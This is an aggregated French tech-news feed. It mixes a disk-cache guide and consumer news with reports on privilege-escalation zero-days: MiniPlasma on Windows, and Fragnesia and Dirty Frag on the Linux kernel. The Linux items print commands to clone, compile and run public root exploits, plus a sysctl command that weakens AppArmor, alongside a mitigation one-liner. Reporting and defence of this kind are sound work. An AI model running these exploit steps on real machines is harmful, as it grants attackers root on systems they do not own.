Un nouveau zero-day Windows baptisé « MiniPlasma » vient d’être publié publiquement avec un exploit Proof of Concept (PoC). La vulnérabilité permettrait à un utilisateur disposant déjà d’un accès local limité d’obtenir les privilèges SYSTEM, soit le niveau d’accès le plus élevé sous Windows.

Cette nouvelle faille a été révélée par le chercheur « Chaotic Eclipse », déjà à l’origine des récents PoC BlueHammer, RedSun, UnDefend et YellowKey visant différentes protections de Windows et BitLocker.

MiniPlasma exploite le Planificateur de tâches Windows

Selon les premières analyses, MiniPlasma cible le service Windows Task Scheduler (Planificateur de tâches).

Le PoC exploiterait une mauvaise gestion des liens symboliques et des permissions de certains fichiers utilisés pendant l’exécution de tâches système. L’attaquant pourrait alors détourner ce mécanisme pour exécuter du code avec les privilèges SYSTEM.

Concrètement, un utilisateur standard pourrait :

• créer certains liens symboliques
• manipuler des chemins de fichiers spécifiques
• déclencher une tâche système
• obtenir une élévation de privilèges complète

Le PoC publié permettrait d’obtenir un shell SYSTEM en quelques secondes sur certaines versions de Windows.

Une faille locale mais très dangereuse

MiniPlasma ne permet pas une compromission à distance directe via Internet. L’attaquant doit déjà disposer :

• d’un accès local
• ou d’un malware exécuté avec des droits utilisateur classiques

Mais ce type de faille reste extrêmement critique dans les chaînes d’attaque modernes.

En pratique, les cybercriminels utilisent souvent ce genre d’élévation de privilèges après :

• un phishing
• une exécution de malware
• une faille navigateur
• une compromission RDP
• une infection initiale limitée

L’objectif est ensuite d’obtenir les privilèges SYSTEM afin de :

• désactiver Microsoft Defender
• contourner certaines protections
• installer des rootkits
• accéder à davantage de données
• persister dans le système

Une ancienne faille Google Project Zero toujours exploitable ?

Selon le chercheur Chaotic Eclipse, MiniPlasma ne serait pas une vulnérabilité entièrement nouvelle. Le problème toucherait en réalité le pilote système cldflt.sys, utilisé par Windows pour les fonctionnalités Cloud Filter liées notamment à OneDrive et aux fichiers à la demande.

La faille se situerait plus précisément dans la routine HsmOsBlockPlaceholderAccess.

Le plus surprenant est que cette vulnérabilité avait déjà été signalée à Microsoft en septembre 2020 par le chercheur James Forshaw de Google Project Zero. À l’époque, elle avait reçu l’identifiant CVE-2020-17103 et Microsoft avait annoncé un correctif déployé en décembre 2020.

Mais selon Chaotic Eclipse, le problème serait toujours exploitable aujourd’hui.

Le chercheur affirme que :

• soit le correctif initial n’a jamais complètement résolu le problème
• soit une modification ultérieure de Windows aurait réintroduit silencieusement la faille

Encore plus inquiétant, il explique que le PoC original publié par Google fonctionnerait toujours sans modification majeure.

BleepingComputer a d’ailleurs testé l’exploit sur un système Windows 11 Pro entièrement à jour avec les mises à jour Patch Tuesday de mai 2026.

Dans leur test :

• un simple compte utilisateur standard a été utilisé
• l’exploit a été exécuté localement
• une invite de commande avec les privilèges SYSTEM a été obtenue immédiatement

Cela montre que la vulnérabilité reste exploitable même sur des systèmes Windows 11 récents et entièrement patchés.

Un nouveau PoC publié avant correctif Microsoft

Comme pour les précédentes vulnérabilités publiées par Chaotic Eclipse, Microsoft n’aurait pas encore publié de correctif officiel au moment de la publication du PoC.

Le chercheur accuse une nouvelle fois Microsoft d’avoir ignoré ou retardé le traitement de certains rapports de sécurité.

Ces derniers mois, plusieurs PoC similaires ont été publiés publiquement avant correction :

• BlueHammer
• RedSun
• UnDefend
• YellowKey
• GreenPlasma

Certaines de ces vulnérabilités ont finalement été corrigées discrètement dans les Patch Tuesday suivants après médiatisation.

Pour aller plus loins sur le sujet :

• Windows : des failles zero-day Microsoft Defender exposées, déjà exploitées dans des attaques
• Une faille BitLocker permettrait d’accéder à des disques chiffrés Windows : un PoC publié

Les protections Windows modernes ne suffisent pas toujours

Même avec :

• Secure Boot
• TPM
• VBS
• HVCI
• Microsoft Defender

Windows reste vulnérable aux élévations de privilèges locales lorsque certains composants historiques du système sont mal protégés.

Le problème est que Windows conserve encore énormément de mécanismes hérités pour :

• la compatibilité logicielle
• les services système
• les tâches planifiées
• les composants Win32 historiques

Le Planificateur de tâches Windows est notamment une cible régulière des chercheurs sécurité car il fonctionne avec des privilèges très élevés et interagit avec de nombreux composants système sensibles.

Microsoft pourrait corriger discrètement la faille

Pour le moment, Microsoft n’a pas communiqué officiellement sur MiniPlasma.

Mais au vu des précédents cas récents, il est probable que :

• un correctif soit préparé
• une CVE soit attribuée plus tard
• la correction arrive dans un futur Patch Tuesday

Les administrateurs système et utilisateurs sensibles doivent donc :

• surveiller les prochaines mises à jour Windows
• éviter l’exécution de programmes non fiables
• limiter les comptes administrateurs locaux
• maintenir Microsoft Defender actif

Sources :

• BleepingComputer – MiniPlasma zero-day
• The Register – Nouveau PoC Windows privilege escalation
• BleepingComputer – YellowKey BitLocker exploit
• Microsoft – Windows Task Scheduler documentation

L’article MiniPlasma : un nouveau zero-day Windows donne les privilèges SYSTEM, un PoC publié est apparu en premier sur malekal.com.

Sous Windows et Linux, les SSD, disques durs et périphériques USB utilisent un cache disque afin d’améliorer les performances des lectures et écritures.

Le cache d’écriture permet notamment d’accélérer les copies de fichiers, mais peut aussi provoquer des pertes de données ou des corruptions de fichiers en cas de coupure électrique ou de débranchement USB brutal.

Dans ce guide, vous apprendrez comment fonctionne le cache disque et le cache d’écriture sous Windows et Linux, leurs avantages, leurs risques et comment éviter les corruptions disque.

De manière générale, si vous souhaitez comprendre le principe du cache, consultez ce guide annexe : Qu’est-ce qu’un cache (en informatique).
Du côté de Windows, consultez aussi ce guide : Cache d’écriture Windows : suppression rapide ou meilleures performances

Cache disque : ce qu’il faut retenir

• Le cache disque améliore les performances
• Les données sont temporairement stockées en mémoire RAM
• Le cache d’écriture accélère les copies de fichiers
• Une coupure électrique ou un retrait USB brutal peut provoquer une corruption de données
• Sous Windows, le mode “Suppression rapide” limite les risques sur les clés USB

Le cache disque est utile, mais nécessite d’utiliser correctement l’éjection sécurisée USB.

Qu’est-ce que le cache disque

Le cache disque est une mémoire temporaire utilisée par le système d’exploitation ou le périphérique de stockage afin d’accélérer les lectures et écritures sur un disque dur, un SSD ou une clé USB.

Lorsqu’un fichier est lu ou écrit :

• Les données peuvent être temporairement stockées en mémoire
• Puis écrites plus tard sur le disque physique
• Ou conservées afin d’accélérer les accès suivants

Le cache disque permet ainsi :

• D’améliorer les performances
• Réduire les accès physiques au disque
• Accélérer les copies de fichiers
• Limiter les temps d’attente

Le tableau ci-dessous résume les principaux types de cache disque.

Sous Windows et Linux, le cache disque est utilisé :

• Sur les SSD
• Les disques durs HDD
• Les clés USB
• Les disques externes

À quoi sert le cache disque ?

Le cache disque permet d’améliorer les performances des périphériques de stockage en réduisant les accès directs au disque dur, SSD ou périphérique USB.

Sans cache disque :

• Chaque lecture ou écriture serait effectuée directement sur le support physique
• Les performances seraient beaucoup plus faibles
• Les temps d’accès augmenteraient fortement

Le cache disque sert principalement à :

• Accélérer les lectures de fichiers
• Améliorer les vitesses d’écriture
• Réduire les accès physiques au disque
• Limiter les temps d’attente
• Optimiser les performances du système

Le tableau ci-dessous résume les principaux avantages du cache disque.

Le cache disque est utilisé :

• Par Windows et Linux
• Les SSD
• Les disques durs HDD
• Les clés USB
• Les disques externes

Par exemple :

• Lors d’une copie de fichiers
• Les données peuvent être d’abord écrites dans le cache RAM
• Puis transférées ensuite sur le disque physique

C’est pour cette raison qu’un périphérique USB peut sembler avoir terminé une copie alors que certaines écritures sont encore en attente en arrière-plan.

Comment fonctionne le cache disque sous Windows et Linux ?

Le cache disque fonctionne comme une mémoire tampon entre le système d’exploitation et le périphérique de stockage.

Au lieu d’écrire ou lire directement chaque donnée sur le disque physique :

• Windows ou Linux stocke temporairement les données dans le cache
• Puis les transfère ensuite vers le SSD, disque dur ou périphérique USB

Cela permet :

• D’accélérer les accès disque
• Réduire les temps de latence
• Limiter les accès physiques au disque
• Améliorer les performances générales

Le cache disque peut fonctionner :

• En lecture
• En écriture
• Ou les deux

Cache en lecture

Le cache en lecture conserve temporairement les fichiers ou données récemment utilisés afin d’accélérer les accès suivants.

Par exemple :

• Lorsqu’un programme ou fichier est ouvert plusieurs fois
• Les données peuvent être relues directement depuis le cache RAM
• Sans accéder de nouveau au disque physique

Cela améliore :

• Les temps de chargement
• La réactivité du système
• Les performances des applications

Cache en écriture

Le cache en écriture stocke temporairement les données avant leur écriture réelle sur le disque.

Par exemple :

• Lors d’une copie de fichiers
• Windows écrit d’abord les données en mémoire
• Puis les transfère ensuite vers le périphérique de stockage

Cette méthode permet :

• D’accélérer les copies
• Réduire les accès disque
• Améliorer les performances USB et SSD

Différence entre write-back et write-through

Le tableau ci-dessous résume les deux principales stratégies de cache d’écriture.

Le mode write-back :

• Offre de meilleures performances
• Mais augmente les risques de perte de données

Le mode write-through :

• Est plus sécurisé
• Mais légèrement moins performant

Sous Windows, les stratégies :

• Suppression rapide
• et Meilleures performances

utilisent justement ces mécanismes de cache disque.

Différence entre cache disque et mémoire RAM

Le cache disque et la mémoire RAM sont liés, mais ils ne jouent pas exactement le même rôle sous Windows ou Linux.

La mémoire RAM sert à stocker temporairement :

• Les programmes en cours d’exécution
• Les données utilisées par le système
• Les applications ouvertes

Le cache disque, lui, utilise souvent une partie de la RAM afin d’accélérer les accès au disque dur, SSD ou périphérique USB.

Le tableau ci-dessous résume les principales différences.

Par exemple :

• Lors d’une copie de fichiers
• Windows peut d’abord écrire les données dans le cache RAM
• Puis transférer les données ensuite sur le disque physique

C’est pour cette raison :

• Qu’un transfert peut sembler terminé alors que le disque travaille encore
• Ou qu’un périphérique USB peut rester actif après une copie

C’est pourquoi :

• Une coupure brutale
• Ou un débranchement USB pendant une écriture

peut provoquer :

• Une perte de données
• Une corruption du système de fichiers
• Des erreurs disque.

Cache disque sur SSD, HDD et périphériques USB

Le cache disque est utilisé sur la plupart des périphériques de stockage :

• Disques durs HDD
• SSD
• Clés USB
• Disques externes USB

Mais son fonctionnement et son importance peuvent varier selon le type de support utilisé.

Le tableau ci-dessous résume les principales différences.

Cache des disques durs HDD

Les disques durs mécaniques utilisent fortement le cache disque afin de :

• Réduire les mouvements de la tête de lecture
• Accélérer les accès aux fichiers
• Améliorer les performances générales

Les HDD possèdent aussi :

• Un cache matériel intégré
• Généralement de quelques Mo à plusieurs centaines de Mo

Cache des SSD

Les SSD utilisent également le cache disque, mais de manière différente.

Le cache permet notamment :

• D’accélérer les écritures
• Réduire l’usure des cellules mémoire
• Optimiser les performances du SSD

Certains SSD utilisent aussi :

• Un cache DRAM
• Ou un cache SLC

afin d’améliorer les vitesses de transfert.

Cache des clés USB et disques externes

Sous Windows, les clés USB et disques externes utilisent souvent :

• Le cache système Windows
• Les stratégies :
  • Suppression rapide
  • Meilleures performances

Avec :

• Suppression rapide
  • Windows limite fortement le cache d’écriture
• Meilleures performances
  • Les performances sont meilleures
  • Mais l’éjection sécurisée devient fortement recommandée

Pourquoi le cache disque peut provoquer une perte de données

Le cache disque améliore les performances des SSD, disques durs et périphériques USB, mais il peut aussi provoquer une perte de données lorsque les écritures ne sont pas encore totalement enregistrées sur le disque physique.

Avec le cache en écriture :

• Les données sont d’abord stockées temporairement en mémoire
• Puis écrites ensuite sur le disque

Tant que cette écriture n’est pas terminée :

• Les fichiers ne sont pas encore totalement sauvegardés
• Une interruption peut corrompre les données

Le tableau ci-dessous présente les situations les plus fréquentes.

Les symptômes les plus fréquents sont :

• Fichiers corrompus
• Erreurs NTFS ou EXT4
• Messages CHKDSK ou fsck
• Partition inaccessible
• Clé USB non reconnue
• Linux ou Windows qui refuse de démarrer

Risques avec les périphériques USB

Les clés USB et disques externes sont particulièrement sensibles :

• Lors des copies de fichiers importantes
• Avec le mode Meilleures performances
• Si le périphérique est retiré sans éjection sécurisée

Même si Windows 11/10 utilise souvent : Suppression rapide

il reste conseillé :

• D’attendre la fin des copies
• D’éviter les débranchements brutaux
• D’utiliser l’éjection sécurisée pour les disques externes importants

Limiter les risques de corruption disque

Pour éviter les pertes de données :

• Utilisez l’éjection sécurisée USB
• Évitez les coupures électriques
• Utilisez un onduleur sur PC fixe
• Sauvegardez régulièrement les fichiers importants
• Vérifiez l’état de santé du disque

Les systèmes d’exploitations fournissent des utilitaires de réparation du système de fichiers :

• chkdsk : vérifier les erreurs de disques NTFS (Windows)
• fsck/e2fsck : vérifier et réparer EXT4 (Linux)

Il est important de s’assurer que vos disques n’ont pas de défaillance matériel via SMART :

• Vérifier l’état de santé d’un disque dur ou SSD (Windows)
• Vérifier l’état de santé d’un disque dur ou SSD (Linux)

Cache d’écriture sous Windows : suppression rapide ou meilleures performances

Sous Windows 11/10, le cache d’écriture disque est utilisé afin d’améliorer les performances des SSD, disques durs et périphériques USB.

Windows utilise principalement deux stratégies pour les périphériques USB :

• Suppression rapide
• Meilleures performances

Le mode Suppression rapide réduit fortement l’utilisation du cache d’écriture afin de limiter les risques de corruption lors du retrait d’une clé USB.

Le mode Meilleures performances utilise davantage le cache disque afin d’améliorer :

• Les copies de fichiers
• Les transferts USB
• Les performances des SSD externes

Guide complet :

Cache d’écriture Windows : suppression rapide ou meilleures performances ?

Cache disque sous Linux et écritures différées

Comme Windows, Linux utilise un cache disque afin d’améliorer les performances des SSD, disques durs et périphériques USB.

Sous Linux :

• Les lectures et écritures disque peuvent être temporairement stockées en mémoire RAM
• Puis transférées ensuite vers le disque physique

Le cache disque Linux permet notamment :

• D’accélérer les accès aux fichiers
• Réduire les accès physiques au disque
• Améliorer les performances du système
• Optimiser les écritures SSD et HDD

Le tableau ci-dessous résume les principaux mécanismes utilisés sous Linux.

Écritures différées sous Linux

Sous Linux, les écritures ne sont pas toujours immédiatement enregistrées sur le disque. Lors d’une copie de fichiers, les données peuvent rester temporairement en mémoire avant d’être écrites sur le disque physique.

C’est pour cette raison qu’un périphérique USB peut continuer à travailler après la fin apparente d’une copie et qu’un débranchement brutal peut provoquer une corruption du système de fichiers EXT4.

Vider le cache disque Linux

Linux permet de forcer l’écriture des données en attente avec :

sync

Cette commande demande au système :

• D’écrire immédiatement les données du cache vers le disque

Elle peut être utile :

• Avant de retirer une clé USB
• Après une copie importante
• Lors d’un dépannage Linux

Risques de corruption sous Linux

Comme sous Windows, une coupure électrique, un crash système ou un débranchement USB brutal peuvent provoquer une corruption du système de fichiers EXT4, une perte de données ou encore des erreurs disque sous Linux.

Comment vérifier ou modifier le cache disque sous Windows

Windows 11/10 permet de modifier la stratégie de cache d’écriture des SSD, disques durs et périphériques USB depuis le Gestionnaire de périphériques.

Vous pouvez notamment choisir entre :

• Suppression rapide
• Meilleures performances

Guide complet :

Cache d’écriture Windows : suppression rapide ou meilleures performances ?

Faut-il désactiver le cache disque

Dans la majorité des cas, il n’est pas recommandé de désactiver complètement le cache disque, car celui-ci améliore fortement les performances des SSD, disques durs et périphériques USB.

Le cache disque permet notamment :

• D’accélérer les copies de fichiers
• Réduire les accès physiques au disque
• Améliorer les performances générales du système

Toutefois, dans certaines situations, réduire ou désactiver le cache d’écriture peut être utile :

• Pour limiter les risques de corruption USB
• Sur certains périphériques externes instables
• En cas de problèmes d’éjection USB
• Lors de coupures électriques fréquentes

Le tableau ci-dessous résume les avantages et inconvénients.

Le cache disque est-il dangereux ?

Non, le cache disque améliore fortement les performances des SSD, HDD et clés USB.
Les risques apparaissent surtout lors :

• d’une coupure électrique
• d’un retrait USB brutal
• d’un crash système

Sous Windows 11/10, le mode Suppression rapide est souvent activé par défaut sur les périphériques USB, ce qui limite déjà fortement les risques de corruption lors du retrait d’une clé USB ou d’un disque externe.

Dans la majorité des cas, il est préférable de conserver le cache disque activé et d’utiliser correctement l’éjection sécurisée USB afin de profiter de meilleures performances tout en limitant les risques de perte de données.

Bonnes pratiques pour éviter les corruptions disque

Une corruption du système de fichiers peut provoquer :

• Des fichiers endommagés
• Des erreurs disque
• Une clé USB illisible
• Des erreurs NTFS ou EXT4
• Un Windows ou Linux qui ne démarre plus

Le tableau ci-dessous résume les principales bonnes pratiques permettant de limiter les risques de corruption disque.

Utiliser l’éjection sécurisée USB

Même avec le mode :

• Suppression rapide

il reste conseillé d’éjecter correctement :

• Les disques externes
• Les SSD USB
• Les clés USB importantes

Comment éjecter une clé USB ou un disque externe sous Windows :

Comment éjecter une clé USB ou un disque externe sous Windows

Vérifier régulièrement l’état du disque

Un disque défaillant peut provoquer :

• Des corruptions répétées
• Des erreurs NTFS ou EXT4
• Des pertes de données

Ressources utiles et articles liés

• Qu’est-ce qu’un cache (en informatique)
• Windows 11/10 : comment vider les caches système (DNS, Windows Update, Store, etc.)

• Pourquoi défragmenter son disque : La fragmentation et défragmentation
• Comment défragmenter les disques ou SSD sur Windows 11/10
• 10 meilleurs logiciels pour défragmenter son disque
• Désactiver la défragmentation de son disque ou SSD sur Windows 11/10
• Défragmenter le registre Windows
• Fsutil : optimiser NTFS pour les disques HDD ou SSD
• Optimiser et accélérer son SSD sous Windows 11/10 (guide complet)
• Comment améliorer la vitesse du disque dur (HDD) et les performances de Windows 11/10
• TUTO – Optimiser son SSD
• Nettoyer Windows 11/10 : libérer de l’espace disque et accélérer le PC
• Secteur, cluster, unité d’allocation et bloc de disque : qu’est-ce que c’est
• NTFS, EXT4 : Comprendre les systèmes de fichiers
• Partitionner et formater un disque sous Windows
• Formatage de disque, formatage rapide, formatage bas niveau
• Optimiser le cache disque avec AnalogX CacheBooster

L’article Qu’est-ce que le cache disque sous Windows et Linux est apparu en premier sur malekal.com.

Une faille baptisée YellowKey permet de contourner la protection BitLocker sur certains PC Windows 11 avec un simple accès physique à la machine.

Cet article Votre PC Windows 11 est-il protégé en cas de vol ? YellowKey prouve que non ! a été publié en premier par GinjFo.

Déplacer la barre des tâches en haut ou sur les côtés de l'écran sera bientôt possible sur Windows 11. Microsoft expérimente actuellement de nouvelles options pour vous redonner le contrôle sur votre interface et votre menu Démarrer.

Bon, accrochez vous les amis, car ça enchaine sec sur le kernel Linux en ce moment... Le chercheur William Bowling de l'équipe V12 security vient de lâcher Fragnesia (CVE-2026-46300, CVSS 7.8), un nouvel exploit kernel Linux qui permet d'obtenir un accès root sur toutes les distros majeures, et ce, 8 jours seulement après le patch de Dirty Frag.

Et la mauvaise nouvelle, en fait, c'est que Fragnesia tape dans la même surface d'attaque que Dirty Frag , mais via un bug logique différent qui n'est pas fixé par le patch initial. Donc si vous aviez sagement mis à jour votre noyau le 8 mai dernier en pensant être tranquille, hé bah désolé, vous êtes toujours à poil !

La lignée "Dirty" continue donc tout simplement de s'allonger... Dirty COW en 2016, Dirty Pipe en 2022, Copy Fail le 1er mai 2026, Dirty Frag le 8 mai, et maintenant Fragnesia le 14 mai. Quatre LPE (local privilege escalation) kernel Linux en deux semaines, c'est un record je crois !

Alors comment ça marche ?

Le bug se planque dans la partie du kernel qui gère le chiffrement réseau IPsec. C'est le truc qu'on utilise pour faire du VPN d'entreprise et l'attaque détourne le moteur de chiffrement pour qu'il écrive là où il ne devrait surtout pas écrire.

Le déroulé ensuite est assez simple à comprendre. Il prend un fichier sensible déjà ouvert en lecture (genre /usr/bin/su, le programme qui fait passer en root), il le balance dans une connexion réseau, et il dit au kernel "tiens, chiffre-moi tout ça en IPsec". Le kernel obéit gentiment, sauf qu'au lieu d'envoyer le résultat chiffré sur le réseau, il vient écraser la version du fichier qui est en mémoire avec les octets chiffrés. Du coup /usr/bin/su contient maintenant du code choisi par l'attaquant. Suffit ensuite de taper su pour devenir root.

Et là c'est le drame !

Le pire, c'est qu'il n'y a aucun "tirage au sort" dans tout ça. Pas besoin de gagner une condition de course une fois sur mille comme à l'époque de Dirty COW. Là, c'est 100% reproductible à chaque exécution, ça marche du premier coup.

La cause profonde, c'est une fonction kernel qui assemble des morceaux de paquets réseau et qui oublie au passage que certains morceaux pointent vers de la mémoire qui ne lui appartient pas vraiment (genre la mémoire d'un fichier qu'un autre process est en train de lire). Bowling appelle ça la "famille Dirty Frag" parce que c'est exactement le même genre d'amnésie qui avait permis Dirty Frag la semaine dernière.

Et le patch du 8 mai n'a pas suffi parce qu'il a juste rebouché un trou particulier, sans toucher à la fonction d'origine. D'où la sortie immédiate du PoC le 14 mai, parce qu'autant prévenir tout le monde, plutôt que de laisser un 0-day silencieux circuler dans les milieux moins recommandables d'Internet.

Testez sur votre Linux

Si vous voulez reproduire ça dans un environnement isolé (genre une VM Ubuntu 24.04 avec un kernel 6.8.0-111-generic), c'est simple :

git clone https://github.com/v12-security/pocs.git
cd pocs/fragnesia
gcc -o exp fragnesia.c && ./exp

sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0

Votre navigateur ne supporte pas la lecture de vidéos HTML5. Voici un
<a href="/fragnesia/fragnesia-1.mp4">lien vers la vidéo</a>.

echo 3 > /proc/sys/vm/drop_caches

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/fragnesia.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

Cet article a été réalisé en collaboration avec Materiel.net

Les configurations de PC gamer « Full AMD » sont-elles devenues le nouveau standard du gaming haut de gamme ? La question est plus que jamais d’actualité et nous avons décidé de la mettre à l’épreuve en passant au crible la configuration Trinity de Materiel.net.

Cet article a été réalisé en collaboration avec Materiel.net

Il s’agit d’un contenu créé par des rédacteurs indépendants au sein de l’entité Humanoid xp. L’équipe éditoriale de Numerama n’a pas participé à sa création. Nous nous engageons auprès de nos lecteurs pour que ces contenus soient intéressants, qualitatifs et correspondent à leurs intérêts.

En savoir plus

Avec les Googlebook, une toute nouvelle gamme d'ordinateurs premium taillée pour l'intelligence artificielle Gemini, Google s'attaque frontalement aux MacBook d'Apple et aux PC Windows. Voici tout ce qu'il faut savoir sur ces nouveaux ordinateurs prévus pour la fin d'année 2026.

15 ans après les Chromebook, Google monte en puissance avec une nouvelle proposition pour réinventer l'ordinateur portable. Les Googlebook, qui seront lancés en fin d'année, misent sur une intégration profonde de l'IA pour se faire une place sur un marché saturé par Windows et macOS.

Le site officiel de JDownloader a été compromis début mai. Pendant 24 heures, certains liens de téléchargement Windows et Linux ont redirigé vers des fichiers malveillants capables d’installer un RAT Python.

Cet article JDownloader, le site officiel a diffusé des installeurs malveillants Windows et Linux a été publié en premier par GinjFo.

[Deal du jour] Vous souhaitez augmenter le stockage de votre PS5 ? Ce SSD de Lexar de 1 To est en promotion.

Fervent défenseur du « chargeur universel » et de la connectique USB-C, la Commission européenne a envoyé à des journalistes et influenceurs un kit « microphone cravate sans-fil » qui se branche en Lightning. Difficile d'y voir autre chose qu'une erreur du service de communication, mais l'anecdote fait évidemment rire.

Un développeur connu sous le pseudonyme krauseler a glissé un ordinateur complet, écran e-paper et NFC compris, dans une carte de 1 mm d'épaisseur. Le projet, baptisé Muxcard, n'est pas commercial, mais il esquisse à quoi pourrait ressembler l'informatique discrète des prochaines années.

60% des mots de passe hashés en MD5 peuvent être cassés en moins d'une heure... C'est ce que dit en tout cas une étude de Kaspersky publiée cette semaine qui se base sur +231 millions de mots de passe qu'on peut trouver sur le dark web et tirés de fuites ayant eu lieu entre 2023 et 2026. D'après leurs tests, 48% sont craqués en moins d'une minute et 60% en moins d'une heure. C'est pas très rassurant, surtout si votre base tourne encore au MD5.

Ce qui a changé ces dernières années, c'est surtout la puissance des GPU modernes qui n'a cessé d'augmenter. Par exemple, une RTX 5090 monte à 220 milliards de hash MD5 par seconde ce qui représente une augmentation de +34% par rapport à la RTX 4090 ! Du coup, louer un GPU cloud pour lancer une attaque par dictionnaire revient à quelques dizaines de centimes à quelques dollars de l'heure. C'est rentable hein ?

L'étude souligne aussi que 53% des mots de passe du corpus se terminent par des chiffres. Et là, du point de vue des règles hashcat, c'est du pain bénit car les crackers adorent la prévisibilité. Alors attention si vous administrez un service web avec une gestion de comptes utilisateur car les attaques modernes (dictionnaire + règles hashcat) règlent aujourd'hui son compte à une bonne partie du corpus et cela en moins d'une minute. Par contre, les mots de passe longs avec symboles variés résistent encore puisque c'est exponentiel ! Vaut mieux une phrase de passe avec plein de mots et facile à retenir du genre running-douche-afford-laborer-art-amber-deftly-acetone-lego-reoccupy qu'un mot de passe court et complexe comme 3d2^vO$RZ1.

Bref, MD5 pour les mots de passe c'est mort donc si vous avez encore ça dans vos bases, migrez moi tout ce bordel rapidement ! La migration maintenant, ça se fait vers Argon2id en priorité... Je balance pas ça au pif, hein, c'est le standard recommandé par OWASP et le NIST, et c'est memory-hard, donc les GPU ne peuvent pas juste brute-forcer des milliards de hashs par seconde comme avec MD5.

Après si votre stack est ancienne et qu'Argon2id n'est pas dispo, bcrypt reste une option solide. Dans tous les cas, évitez SHA-1, SHA-256 ou SHA-512 sans algorithme adaptatif car ils sont rapides par conception, donc tout aussi crackables que MD5.

Source

Le chercheur en sécu Hyunwoo Kim vient de lâcher dans la nature Dirty Frag, un nouvel exploit kernel Linux qui enchaîne 2 vulnérabilités pour obtenir un accès root sur n'importe quelle distro majeure, avec un taux de réussite proche de 100%.

L'embargo devait tenir encore quelques semaines. Il n'a pas tenu.

Et problème (et c'est pour ça que je vous en parle) c'est que ça marche du feu de dieu, et que personne n'a encore de patch disponible !! Alerte rouge donc !!

La lignée "Dirty" a donc maintenant quatre membres. Dirty COW en 2016, avec ses 9 ans de présence silencieuse dans le kernel avant d'être découvert, Dirty Pipe en 2022, Copy Fail dont je vous parlais il y a tout juste 8 jours, découvert par une IA. Et maintenant Dirty Frag, qui s'appuie sur le même principe que Copy Fail tout en contournant sa mitigation connue.

Alors comment ça marche ?

Le concept du truc c'est l'abus d'un mécanisme tout à fait légitime du kernel Linux : splice(). Cette fonction permet de faire circuler des données entre deux descripteurs de fichiers sans les copier en mémoire. C'est très utile, très performant, mais dans certaines configurations, c'est surtout très catastrophique.

Dirty Frag exploite les modules réseau d'IPsec (ESP) et du protocole RxRPC, ainsi quand un attaquant utilise splice() pour faire passer une page du cache mémoire (disons, /usr/bin/su) dans un buffer réseau, le kernel effectue son chiffrement directement sur cette page en RAM et sans faire de copie.

Résultat, les premiers octets de /usr/bin/su en mémoire sont remplacés par du code malveillant qui ouvre un shell root. Un simple appel à su ensuite, et l'attaquant est root.

Deux CVE sont impliqués dans la chaîne. CVE-2026-43284 qui concerne les modules esp4 et esp6 et qui a été patchée depuis hier et CVE-2026-43500 qui concerne rxrpc et pour celle-ci, y'a aucun patch actuellement à l'heure où j'écris ces lignes.

Le fait de chainer les 2 exploits permet à chacun de combler les angles morts de l'autre. C'est un peu technique mais en gros, la variante ESP requiert les droits de créer un namespace utilisateur, ce qu'Ubuntu peut bloquer via AppArmor. Alors que de son côté, la variante RxRPC ne nécessite pas ce privilège, mais le module rxrpc.ko n'est chargé par défaut que sur... Ubuntu. Du coup, une fois combinés, ils couvrent toutes les distros majeures sans exception.

Hyunwoo Kim a reporté la faille aux mainteneurs des distribs le 30 avril dernier, avec un accord de divulgation coordonnée via [email protected]. Mais un tiers extérieur (appelons le "connard" ^^) a brisé l'embargo hier, d'où la publication immédiate du PoC, avec l'accord des maintainers, pour éviter qu'un exploit silencieux circule sans que personne soit prévenu.

Les versions testées et confirmées vulnérables sont donc Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44.

En gros, si vous avez un kernel compilé depuis début 2017, vous êtes dans le scope.

Tester avec Lima sur macOS

Si vous voulez reproduire ça dans un environnement contrôlé, l'idée c'est de lancer une Ubuntu 24.04 avec le kernel non patché et de faire comme ceci :

# Cloner, compiler, et lancer
git clone https://github.com/V4bel/dirtyfrag.git
cd dirtyfrag
sudo apt install gcc -y && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Et si tout se passe bien, vous obtenez alors un shell root sans faire paniquer le kernel comme chez moi ici :

Après le test, le page cache est contaminé donc avant de faire quoi que ce soit d'autre, faut le nettoyer. :

echo 3 > /proc/sys/vm/drop_caches

Ou plus simple, redémarrez la machine car la modification est uniquement en RAM, donc un reboot permet de repartir de zéro.

Alors que faire ?

Hé bien, comme aucun patch n'est disponible pour la plupart des distros à l'heure où j'écris ces lignes, vous pouvez vous mettre en boule et pleurer. Sauf si vous êtes sous AlmaLinux car eux ont déjà poussé des kernels corrigés. Après vous pouvez aussi sécher vos larmes si vous êtes sur une autre distro, et suivre cette remédiation qui vous prendra trente secondes :

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

Cette commande fait trois choses : elle blackliste les modules vulnérables pour qu'ils ne se rechargent pas au prochain boot, elle les décharge s'ils sont actifs, et elle nettoie le page cache au cas où il serait déjà corrompu.

Après c'est tranquille à faire car esp4, esp6 et rxrpc ne sont pas des modules que la plupart des machines desktop utilisent au quotidien. Les désactiver n'a donc aucun impact visible sur 99% des setups. Mais un serveur qui fait du VPN IPsec en mode transport ESP, lui, sera affecté...

En tout cas, surveillez ça de près car une fois que votre distro sortira le patch, faudra mettre à jour et rebooter.

Source : https://github.com/V4bel/dirtyfrag

[Deal du jour] Passer à l’OLED sur PC est souvent un investissement de taille, surtout quand on cherche un grand format ultra-rapide. Habituellement affiché à un tarif élitiste, l'un des moniteurs les plus immersifs du marché devient enfin plus accessible grâce à une grosse remise.

Écran cassé de MacBook : réparer ou remplacer ? En 2026, entre hausse des prix, options de réparation et alternatives plus accessibles, le choix devient plus complexe qu’il n’y paraît.

L’article Réparation d’écran MacBook : réparer ou remplacer, le vrai calcul en 2026 est apparu en premier sur Tom’s Hardware.

